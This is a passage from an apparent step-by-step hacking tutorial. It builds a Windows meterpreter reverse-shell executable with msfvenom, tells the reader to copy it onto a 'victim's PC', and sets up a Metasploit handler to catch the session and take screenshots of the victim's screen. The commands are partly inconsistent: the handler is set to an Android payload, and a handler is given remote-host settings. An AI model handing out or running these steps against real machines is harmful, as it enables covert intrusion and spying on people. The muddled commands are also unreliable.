root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.159 lport=4444 -f exe -a x86 > Hack.exe

After successfully creating payload Hack.exe, copy that payload in to the victim’s PC (Windows).

Step 5: Exploit using Command Prompt


● Now we will use an exploit that can work for us. Open metasploit and set handler:
Using following command
root@kali:~# msfconsole

Step 6: After that run these command to set Local host


msf5>use exploit/multi/handler
msf5 exploit(multi/handler)>set payload android/meterpreter/reverse_tcp
msf5 exploit(multi/handler)>>set lhost 192.168.43.159
msf5 exploit(multi/handler)>>set lport 4444
msf5 exploit(multi/handler)>>show options
Step 7: After that run these commands to set Remote host
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set rhost 192.168.43.99
msf5 exploit(multi/handler) > set rport 80
msf5 exploit(multi/handler) > show options

Step 8: After a successful exploit

Step 9: Capture the session on the remote host: type the command screenshot; it captures the victim PC's screenshot and saves it in the root
directory.

File store in root directory

Capture output
